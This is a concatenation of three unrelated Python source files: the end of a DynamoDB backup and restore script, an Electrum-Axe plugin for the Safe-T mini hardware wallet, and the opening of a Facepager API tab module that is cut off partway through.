+ " table created. Time taken: "
+ str(datetime.datetime.now().replace(microsecond=0) - start_time)
)
def main():
"""
Entrypoint to the script
"""
global args, sleep_interval, start_time
# parse args
parser = argparse.ArgumentParser(
description="Simple DynamoDB backup/restore/empty."
)
parser.add_argument(
"-a",
"--archive",
help="Type of compressed archive to create." "If unset, don't create archive",
choices=["zip", "tar"],
)
parser.add_argument(
"-b",
"--bucket",
help="S3 bucket in which to store or retrieve backups." "[must already exist]",
)
parser.add_argument(
"-m",
"--mode",
help="Operation to perform",
choices=["backup", "restore", "empty"],
)
parser.add_argument(
"-r",
"--region",
help="AWS region to use, e.g. 'us-west-1'. "
"Can use AWS_DEFAULT_REGION for local testing. Use '"
+ LOCAL_REGION
+ "' for local DynamoDB testing",
)
parser.add_argument(
"--host", help="Host of local DynamoDB [required only for local]"
)
parser.add_argument(
"--port", help="Port of local DynamoDB [required only for local]"
)
parser.add_argument(
"--accessKey", help="Access key of local DynamoDB " "[required only for local]"
)
parser.add_argument(
"--secretKey", help="Secret key of local DynamoDB " "[required only for local]"
)
parser.add_argument(
"-p",
"--profile",
help="AWS credentials file profile to use. Allows you to use a "
"profile instead accessKey, secretKey authentication",
)
parser.add_argument(
"-s",
"--srcTable",
help="Source DynamoDB table name to backup or restore from, "
"use 'tablename*' for wildcard prefix selection or '*' for "
"all tables. Mutually exclusive with --tag",
)
parser.add_argument(
"-d",
"--destTable",
help="Destination DynamoDB table name to backup or restore to, "
"use 'tablename*' for wildcard prefix selection "
"(defaults to use '-' separator) [optional, defaults to source]",
)
parser.add_argument(
"--prefixSeparator",
help="Specify a different prefix separator, " "e.g. '.' [optional]",
)
parser.add_argument(
"--noSeparator",
action="store_true",
help="Overrides the use of a prefix separator for backup wildcard "
"searches [optional]",
)
parser.add_argument(
"--readCapacity",
help="Change the temp read capacity of the DynamoDB table to backup "
"from [optional]",
)
parser.add_argument(
"-t",
"--tag",
help="Tag to use for identifying tables to back up. "
"Mutually exclusive with srcTable. Provided as KEY=VALUE",
)
parser.add_argument(
"--writeCapacity",
help="Change the temp write capacity of the DynamoDB table to restore "
"to [defaults to " + str(RESTORE_WRITE_CAPACITY) + ", optional]",
)
parser.add_argument(
"--schemaOnly",
action="store_true",
default=False,
help="Backup or restore the schema only. Do not backup/restore data. "
"Can be used with both backup and restore modes. Cannot be used with "
"the --dataOnly [optional]",
)
parser.add_argument(
"--dataOnly",
action="store_true",
default=False,
help="Restore data only. Do not delete/recreate schema [optional for "
"restore]",
)
parser.add_argument(
"--noConfirm",
action="store_true",
default=False,
help="Don't ask for confirmation before deleting existing schemas.",
)
parser.add_argument(
"--skipThroughputUpdate",
action="store_true",
default=False,
help="Skip updating throughput values across tables [optional]",
)
parser.add_argument(
"--dumpPath",
help="Directory to place and search for DynamoDB table "
"backups (defaults to use '" + str(DATA_DUMP) + "') [optional]",
default=str(DATA_DUMP),
)
parser.add_argument(
"--billingMode",
help="Set billing mode between "
+ str(PROVISIONED_BILLING_MODE)
+ "|"
+ str(PAY_PER_REQUEST_BILLING_MODE)
+ " (defaults to use '"
+ str(PROVISIONED_BILLING_MODE)
+ "') [optional]",
choices=[PROVISIONED_BILLING_MODE, PAY_PER_REQUEST_BILLING_MODE],
default=str(PROVISIONED_BILLING_MODE),
)
parser.add_argument(
"--log", help="Logging level - DEBUG|INFO|WARNING|ERROR|CRITICAL " "[optional]"
)
args = parser.parse_args()
# set log level
log_level = LOG_LEVEL
if args.log is not None:
log_level = args.log.upper()
logging.basicConfig(level=getattr(logging, log_level))
# Check to make sure that --dataOnly and --schemaOnly weren't simultaneously specified
if args.schemaOnly and args.dataOnly:
logging.info("Options --schemaOnly and --dataOnly are mutually exclusive.")
sys.exit(1)
# instantiate connection
if args.region == LOCAL_REGION:
conn = _get_aws_client(
service="dynamodb",
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
endpoint_url="http://" + args.host + ":" + args.port,
)
sleep_interval = LOCAL_SLEEP_INTERVAL
else:
if not args.profile:
conn = _get_aws_client(
service="dynamodb",
access_key=args.accessKey,
secret_key=args.secretKey,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
else:
conn = _get_aws_client(
service="dynamodb",
profile=args.profile,
region=args.region,
)
sleep_interval = AWS_SLEEP_INTERVAL
# don't proceed if connection is not established
if not conn:
logging.info("Unable to establish connection with dynamodb")
sys.exit(1)
# set prefix separator
prefix_separator = DEFAULT_PREFIX_SEPARATOR
if args.prefixSeparator is not None:
prefix_separator = args.prefixSeparator
if args.noSeparator is True:
prefix_separator = None
# do backup/restore
start_time = datetime.datetime.now().replace(microsecond=0)
if args.mode == "backup":
matching_backup_tables = []
if args.tag:
# Use Boto3 to find tags. Boto3 provides a paginator that makes searching ta
matching_backup_tables = get_table_name_by_tag(
args.profile, args.region, args.tag
)
elif args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(
conn, args.srcTable, prefix_separator
)
elif args.srcTable:
matching_backup_tables.append(args.srcTable)
if len(matching_backup_tables) == 0:
logging.info("No matching tables found. Nothing to do.")
sys.exit(0)
else:
logging.info(
"Found "
+ str(len(matching_backup_tables))
+ " table(s) in DynamoDB host to backup: "
+ ", ".join(matching_backup_tables)
)
try:
if args.srcTable.find("*") == -1:
do_backup(conn, args.read_capacity, tableQueue=None)
else:
do_backup(conn, args.read_capacity, matching_backup_tables)
except AttributeError:
# Didn't specify srcTable if we get here
q = Queue()
threads = []
for i in range(MAX_NUMBER_BACKUP_WORKERS):
t = threading.Thread(
target=do_backup,
args=(conn, args.readCapacity),
kwargs={"tableQueue": q},
)
t.start()
threads.append(t)
time.sleep(THREAD_START_DELAY)
for table in matching_backup_tables:
q.put(table)
q.join()
for i in range(MAX_NUMBER_BACKUP_WORKERS):
q.put(None)
for t in threads:
t.join()
try:
logging.info("Backup of table(s) " + args.srcTable + " completed!")
except (NameError, TypeError):
logging.info(
"Backup of table(s) "
+ ", ".join(matching_backup_tables)
+ " completed!"
)
if args.archive:
if args.tag:
for table in matching_backup_tables:
dump_path = args.dumpPath + os.sep + table
did_archive, archive_file = do_archive(args.archive, dump_path)
if args.bucket and did_archive:
do_put_bucket_object(
args.profile, args.region, args.bucket, archive_file
)
else:
did_archive, archive_file = do_archive(args.archive, args.dumpPath)
if args.bucket and did_archive:
do_put_bucket_object(
args.profile, args.region, args.bucket, archive_file
)
elif args.mode == "restore":
if args.destTable is not None:
dest_table = args.destTable
else:
dest_table = args.srcTable
# If backups are in S3 download and extract the backup to use during restoration
if args.bucket:
do_get_s3_archive(
args.profile, args.region, args.bucket, args.srcTable, args.archive
)
if dest_table.find("*") != -1:
matching_destination_tables = get_table_name_matches(
conn, dest_table, prefix_separator
)
delete_str = ": " if args.dataOnly else " to be deleted: "
logging.info(
"Found "
+ str(len(matching_destination_tables))
+ " table(s) in DynamoDB host"
+ delete_str
+ ", ".join(matching_destination_tables)
)
threads = []
for table in matching_destination_tables:
t = threading.Thread(
target=delete_table, args=(conn, sleep_interval, table)
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
matching_restore_tables = get_restore_table_matches(
args.srcTable, prefix_separator
)
logging.info(
"Found "
+ str(len(matching_restore_tables))
+ " table(s) in "
+ args.dumpPath
+ " to restore: "
+ ", ".join(matching_restore_tables)
)
threads = []
for source_table in matching_restore_tables:
if args.srcTable == "*":
t = threading.Thread(
target=do_restore,
args=(
conn,
sleep_interval,
source_table,
source_table,
args.writeCapacity,
args.billingMode,
),
)
else:
t = threading.Thread(
target=do_restore,
args=(
conn,
sleep_interval,
source_table,
change_prefix(
source_table,
args.srcTable,
dest_table,
prefix_separator,
),
args.writeCapacity,
args.billingMode,
),
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info(
"Restore of table(s) "
+ args.srcTable
+ " to "
+ dest_table
+ " completed!"
)
else:
delete_table(
conn=conn, sleep_interval=sleep_interval, table_name=dest_table
)
do_restore(
dynamo=conn,
sleep_interval=sleep_interval,
source_table=args.srcTable,
destination_table=dest_table,
write_capacity=args.writeCapacity,
billing_mode=args.billingMode,
)
elif args.mode == "empty":
if args.srcTable.find("*") != -1:
matching_backup_tables = get_table_name_matches(
conn, args.srcTable, prefix_separator
)
logging.info(
"Found "
+ str(len(matching_backup_tables))
+ " table(s) in DynamoDB host to empty: "
+ ", ".join(matching_backup_tables)
)
threads = []
for table in matching_backup_tables:
t = threading.Thread(
target=do_empty, args=(conn, table, args.billingMode)
)
threads.append(t)
t.start()
time.sleep(THREAD_START_DELAY)
for thread in threads:
thread.join()
logging.info("Empty of table(s) " + args.srcTable + " completed!")
else:
do_empty(conn, args.srcTable, args.billingMode)
if __name__ == "__main__":
main()
|
safe_t.py
|
from binascii import hexlify, unhexlify
import traceback
import sys
from electrum_axe.util import bfh, bh2u, versiontuple, UserCancelled, UserFacingException
from electrum_axe.bitcoin import TYPE_ADDRESS, TYPE_SCRIPT
from electrum_axe.bip32 import BIP32Node
from electrum_axe import constants
from electrum_axe.i18n import _
from electrum_axe.plugin import Device
from electrum_axe.transaction import deserialize, Transaction
from electrum_axe.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from electrum_axe.base_wizard import ScriptTypeNotSupported
from ..hw_wallet import HW_PluginBase
from ..hw_wallet.plugin import is_any_tx_output_on_change_branch, trezor_validate_op_return_output_and_get_data
# Safe-T mini initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
class SafeTKeyStore(Hardware_KeyStore):
hw_type = 'safe_t'
device = 'Safe-T mini'
def get_derivation(self):
return self.derivation
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise UserFacingException(_('Encryption and decryption are not implemented by {}').format(self.device))
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
if txin.get('prev_tx') is None:
raise UserFacingException(_('Offline signing with {} is not supported for legacy inputs.').format(self.device))
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class SafeTPlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, types
firmware_URL = 'https://safe-t.io'
libraries_URL = 'https://github.com/archos-safe-t/python-safet'
minimum_firmware = (1, 0, 5)
keystore_class = SafeTKeyStore
minimum_library = (0, 1, 0)
SUPPORTED_XTYPES = ('standard', )
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.libraries_available = self.check_libraries_available()
if not self.libraries_available:
return
from . import client
from . import transport
import safetlib.messages
self.client_class = client.SafeTClient
self.types = safetlib.messages
self.DEVICE_IDS = ('Safe-T mini',)
self.transport_handler = transport.SafeTTransport()
self.device_manager().register_enumerate_func(self.enumerate)
def get_library_version(self):
import safetlib
try:
return safetlib.__version__
except AttributeError:
return 'unknown'
def enumerate(self):
devices = self.transport_handler.enumerate_devices()
return [Device(path=d.get_path(),
interface_number=-1,
id_=d.get_path(),
product_key='Safe-T mini',
usage_page=0,
transport_ui_string=d.get_path())
for d in devices]
def create_client(self, device, handler):
try:
self.logger.info(f"connecting to device at {device.path}")
transport = self.transport_handler.get_transport(device.path)
except BaseException as e:
self.logger.info(f"cannot connect at {device.path} {e}")
return None
if not transport:
self.logger.info(f"cannot connect at {device.path}")
return
self.logger.info(f"connected to device at {device.path}")
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.logger.info(f"ping failed {e}")
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated {} firmware for device labelled {}. Please '
'download the updated firmware from {}')
.format(self.device, client.label(), self.firmware_URL))
self.logger.info(msg)
if handler:
handler.show_error(msg)
else:
raise UserFacingException(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Axe Testnet" if constants.net.TESTNET else "Axe"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your {}.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your {}, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
).format(self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_safe_t_init_settings(wizard, method, self.device)
t = threading.Thread(target=self._initialize_device_safe, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
exit_code = wizard.loop.exec_()
if exit_code != 0:
# this method (initialize_device) was called with the expectation
# of leaving the device in an initialized state when finishing.
# signal that this is not the case:
raise UserCancelled()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device_safe(self, settings, method, device_id, wizard, handler):
exit_code = 0
try:
self._initialize_device(settings, method, device_id, wizard, handler)
except UserCancelled:
exit_code = 1
except BaseException as e:
self.logger.exception('')
handler.show_error(str(e))
exit_code = 1
finally:
wizard.loop.exit(exit_code)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"),
blocking=True)
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if not client:
raise Exception(_("The device was disconnected."))
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
def _make_node_path(self, xpub, address_n):
bip32node = BIP32Node.from_xkey(xpub)
node = self.types.HDNodeType(
depth=bip32node.depth,
fingerprint=int.from_bytes(bip32node.fingerprint, 'big'),
child_num=int.from_bytes(bip32node.child_number, 'big'),
chain_code=bip32node.chaincode,
public_key=bip32node.eckey.get_public_key_bytes(compressed=True),
)
return self.types.HDNodePathType(node=node, address_n=address_n)
def setup_device(self, device_info, wizard, purpose):
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
if client is None:
raise UserFacingException(_('Failed to create a client for this device.') + '\n' +
_('Make sure it is in the correct state.'))
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
if xtype not in self.SUPPORTED_XTYPES:
raise ScriptTypeNotSupported(_('This type of script is not supported with {}.').format(self.device))
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def get_safet_input_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.InputScriptType.SPENDADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.InputScriptType.SPENDMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def get_safet_output_script_type(self, electrum_txin_type: str):
if electrum_txin_type in ('p2pkh', ):
return self.types.OutputScriptType.PAYTOADDRESS
if electrum_txin_type in ('p2sh', ):
return self.types.OutputScriptType.PAYTOMULTISIG
raise ValueError('unexpected txin type: {}'.format(electrum_txin_type))
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True)
outputs = self.tx_outputs(keystore.get_derivation(), tx)
signatures = client.sign_tx(self.get_coin_name(), inputs, outputs,
lock_time=tx.locktime, version=tx.version)[0]
signatures = [(bh2u(x) + '01') for x in signatures]
tx.update_signatures(signatures)
def show_address(self, wallet, address, keystore=None):
if keystore is None:
keystore = wallet.get_keystore()
if not self.show_address_helper(wallet, address, keystore):
return
client = self.get_client(keystore)
if not client.atleast_version(1, 0):
keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
xpubs = wallet.get_master_public_keys()
if len(xpubs) == 1:
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
else:
def f(xpub):
return self._make_node_path(xpub, [change, index])
pubkeys = wallet.get_public_keys(address)
# sort xpubs using the order of pubkeys
sorted_pubkeys, sorted_xpubs = zip(*sorted(zip(pubkeys, xpubs)))
pubkeys = list(map(f, sorted_xpubs))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * wallet.n,
m=wallet.m,
)
script_type = self.get_safet_input_script_type(wallet.txin_type)
client.get_address(self.get_coin_name(), address_n, True, multisig=multisig, script_type=script_type)
def tx_inputs(self, tx, for_sig=False):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = b"\x00"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
txinputtype.script_type = self.get_safet_input_script_type(txin['type'])
else:
def f(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
return self._make_node_path(xpub, s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
script_type = self.get_safet_input_script_type(txin['type'])
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if txin.get('scriptSig') is not None:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx):
def create_output_by_derivation():
script_type = self.get_safet_output_script_type(info.script_type)
if len(xpubs) == 1:
address_n = self.client_class.expand_path(derivation + "/%d/%d" % index)
txoutputtype = self.types.TxOutputType(
amount=amount,
script_type=script_type,
address_n=address_n,
)
else:
address_n = self.client_class.expand_path("/%d/%d" % index)
pubkeys = [self._make_node_path(xpub, address_n) for xpub in xpubs]
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=[b''] * len(pubkeys),
m=m)
txoutputtype = self.types.TxOutputType(
multisig=multisig,
amount=amount,
address_n=self.client_class.expand_path(derivation + "/%d/%d" % index),
script_type=script_type)
return txoutputtype
def create_output_by_address():
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = trezor_validate_op_return_output_and_get_data(o)
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
return txoutputtype
outputs = []
has_change = False
any_output_on_change_branch = is_any_tx_output_on_change_branch(tx)
for o in tx.outputs():
_type, address, amount = o.type, o.address, o.value
use_create_by_derivation = False
info = tx.output_info.get(address)
if info is not None and not has_change:
index, xpubs, m = info.address_index, info.sorted_xpubs, info.num_sig
on_change_branch = index[0] == 1
# prioritise hiding outputs on the 'change' branch from user
# because no more than one change address allowed
# note: ^ restriction can be removed once we require fw
# that has https://github.com/trezor/trezor-mcu/pull/306
if on_change_branch == any_output_on_change_branch:
use_create_by_derivation = True
has_change = True
if use_create_by_derivation:
txoutputtype = create_output_by_derivation()
else:
txoutputtype = create_output_by_address()
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
if tx is None:
# probably for segwit input and we don't need this prev txn
return t
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the TREZOR libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
apimodules.py
|
import urllib.parse
import urllib.request, urllib.error
import secrets
import hashlib, hmac, base64
from mimetypes import guess_all_extensions
from datetime import datetime
from copy import deepcopy
import re
import os, sys, time
import io
from collections import OrderedDict
import threading
from PySide2.QtWebEngineWidgets import QWebEngineView
from PySide2.QtCore import Qt, QUrl
import requests
from requests.exceptions import *
from rauth import OAuth1Service
from requests_oauthlib import OAuth2Session
from requests_toolbelt import MultipartEncoder, MultipartEncoderMonitor
from urllib.parse import urlparse, parse_qs, unquote
import webbrowser
import cchardet
import json
if sys.version_info.major < 3:
from urllib import url2pathname
else:
from urllib.request import url2pathname
import dateutil.parser
from dialogs.folder import SelectFolderDialog
from dialogs.webdialog import PreLoginWebDialog, BrowserDialog, WebPageCustom
from server import LoginServer
from widgets.paramedit import *
from utilities import *
try:
from credentials import *
except ImportError:
credentials = {}
class ApiTab(QScrollArea):
"""
Generic API Tab Class
- parse placeholders
- saves and load current settings
- init basic inputs
- handle requests
"""
streamingData = Signal(list, list, list)
def __init__(self, mainWindow=None, name="NoName"):
QScrollArea.__init__(self, mainWindow)
self.timeout = None
self.maxsize = 5
self.mainWindow = mainWindow
self.loginWindow = None
self.name = name
self.connected = False
self.lastrequest = None
self.speed = None
self.lock_session = threading.Lock()
self.sessions = []
# Layout
self.mainLayout = QFormLayout()
self.mainLayout.setRowWrapPolicy(QFormLayout.DontWrapRows)
self.mainLayout.setFormAlignment(Qt.AlignLeft | Qt.AlignTop)
self.mainLayout.setLabelAlignment(Qt.AlignLeft)
self.mainLayout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
self.mainLayout.setSizeConstraint(QLayout.SetMaximumSize) #QLayout.SetMinimumSize
# Extra layout
self.extraLayout = QFormLayout()
self.extraLayout.setRowWrapPolicy(QFormLayout.DontWrapRows)
self.extraLayout.setFormAlignment(Qt.AlignLeft | Qt.AlignTop)
self.extraLayout.setLabelAlignment(Qt.AlignLeft)
self.extraLayout.setFieldGrowthPolicy(QFormLayout.AllNonFixedFieldsGrow)
# Container
pagelayout = QVBoxLayout()
pagelayout.addLayout(self.mainLayout)
pagelayout.addStretch(0)
pagelayout.addLayout(self.extraLayout)
# For scrolling
page = QWidget(self)
page.setLayout(pagelayout)
self.setWidget(page)
self.setStyleSheet("QScrollArea {border:0px;background-color:transparent;}")
page.setAutoFillBackground(False) #import: place after setStyleSheet
self.setWidgetResizable(True)
# Popup window for auth settings
self.authWidget = QWidget()
# Default settings
try:
self.defaults = credentials.get(name.lower().replace(' ','_'),{})
except NameError:
self.defaults = {}
# Authorization / use preregistered app
self.auth_userauthorized = True
self.auth_preregistered = self.defaults.get('termsurl', '') != ''
# Called when Facepager stops
def cleanup(self):
pass
def idtostr(self, val):
"""
Return the Node-ID as a string
"""
return str(val).encode("utf-8")
def parseURL(self, url):
"""
Parse any url and return the query-strings and base bath
"""
url = url.split('?', 1)
path = url[0]
query = url[1] if len(url) > 1 else ''
query = urllib.parse.parse_qsl(query)
query = OrderedDict((k, v) for k, v in query)
return path, query
def parsePlaceholders(self,pattern,nodedata,paramdata={},options = {}):
if not pattern:
return pattern
elif isinstance(pattern,list):
return [self.parsePlaceholders(x, nodedata, paramdata, options) for x in pattern]
else:
pattern = str(pattern)
#matches = re.findall(ur"<([^>]*>", pattern)
#matches = re.findall(ur"(?<!\\)<([^>]*?)(?<!\\)>", pattern)
#Find placeholders in brackets, ignoring escaped brackets (escape character is backslash)
matches = re.findall(r"(?<!\\)(?:\\\\)*<([^>]*?(?<!\\)(?:\\\\)*)>", pattern)
for match in matches:
name, key, pipeline = parseKey(match)
if key in paramdata:
value = str(paramdata[key])
elif key == 'None':
value = ''
elif key == 'Object ID':
value = {'Object ID':str(nodedata['objectid'])}
name, value = extractValue(value, match, folder=options.get('folder', ''))
else:
name, value = extractValue(nodedata['response'], match, folder=options.get('folder',''))
if (pattern == '<' + match + '>'):
pattern = value
return pattern
else:
#Mask special characters
value = value.replace('\\','\\\\')
value = value.replace('<','\\<')
value = value.replace('>','\\>')
pattern = pattern.replace('<' + match + '>', value)
pattern = pattern.replace('\\<', '<')
pattern = pattern.replace('\\>', '>')
pattern = pattern.replace('\\\\', '\\')
return pattern
def getURL(self, urlpath, params, nodedata,options):
"""
Replaces the Facepager placeholders ("<",">")
by the Object-ID or any other Facepager-Placeholder
Example: http://www.facebook.com/<Object-ID>/friends
"""
urlpath, urlparams = self.parseURL(urlpath)
# Filter empty params
params = {name: params[name] for name in params if (name != '') and (name != '<None>') and (params[name] != '<None>')}
# Collect template parameters (= placeholders)
templateparams = {}
for name in params:
match = re.match(r"^<(.*)>$", str(name))
if match:
# Replace placeholders in parameter value
value = self.parsePlaceholders(params[name], nodedata, {}, options)
templateparams[match.group(1)] = value
# Replace placeholders in parameters
for name in params:
match = re.match(r"^<(.*)>$", str(name))
if not match:
# Replace placeholders in parameter value
value = self.parsePlaceholders(params[name], nodedata, templateparams, options)
if isinstance(value,list):
urlparams[name] = [str(x) for x in value]
else:
urlparams[name] = str(value)
# Replace placeholders in urlpath
urlpath = self.parsePlaceholders(urlpath, nodedata, templateparams)
return urlpath, urlparams, templateparams
def getLogURL(self, urlpath, urlparams, options, removesecrets=True):
url = urlpath
# Convert to list of tuple to allow duplicated keys
if urlparams:
urltuples = dictToTuples(urlparams)
urltuples = urllib.parse.urlencode(urltuples)
if removesecrets:
urltuples = urltuples.replace(options.get('access_token', ''), '')
url += "?" + urltuples
return url
def getPayload(self,payload, params, nodedata,options, logProgress=None):
#Return nothing
if (payload is None) or (payload == ''):
return None
# Parse JSON and replace placeholders in values
elif options.get('encoding','<None>') == 'multipart/form-data':
#payload = json.loads(payload)
for name in payload:
value = payload[name]
try:
value = json.loads(value)
except:
pass
# Files (convert dict to tuple)
if isinstance(value,dict):
filename = self.parsePlaceholders(value.get('name',''), nodedata, params,options)
filedata = self.parsePlaceholders(value.get('data',''), nodedata, params,options)
filetype = self.parsePlaceholders(value.get('type',''), nodedata, params,options)
payload[name] = (filename,filedata,filetype)
# Strings
else:
value = payload[name]
payload[name] = self.parsePlaceholders(value, nodedata, params,options)
def callback(monitor):
if logProgress is not None:
logProgress({'current': monitor.bytes_read, 'total': monitor.len})
payload = MultipartEncoder(fields=payload)
payload = MultipartEncoderMonitor(payload,callback)
return payload
# Replace placeholders in string and setup progress callback
else:
def callback(current, total):
if logProgress is not None:
logProgress({'current': current, 'total': total})
payload = self.parsePlaceholders(payload, nodedata, params,options)
payload = BufferReader(payload,callback)
return payload
# Gets data from input fields or defaults (never gets credentials from default values!)
def getSettings(self, purpose='fetch'): # purpose = 'fetch'|'settings'|'preset'
options = {}
defaults = self.getDefaultAndDocOptions()
#options['module'] = self.name
#options for request
try:
options['basepath'] = self.basepathEdit.currentText().strip()
options['resource'] = self.resourceEdit.currentText().strip()
options['params'] = self.paramEdit.getParams()
except AttributeError:
pass
# Extension (for Twitter, deprecated)
options['extension'] = defaults.get('extension','')
if (options['extension'] != '') and options['resource'].endswith(options['extension']):
options['extension'] = ''
#headers and verbs
try:
options['headers'] = self.headerEdit.getParams()
options['verb'] = self.verbEdit.currentText().strip()
except AttributeError:
pass
#
# # Get doc key for lookup of data handling keys
# doc_resource = options.get('resource', '').strip()
# if doc_resource == '':
# doc_resource = '0'
#format
try:
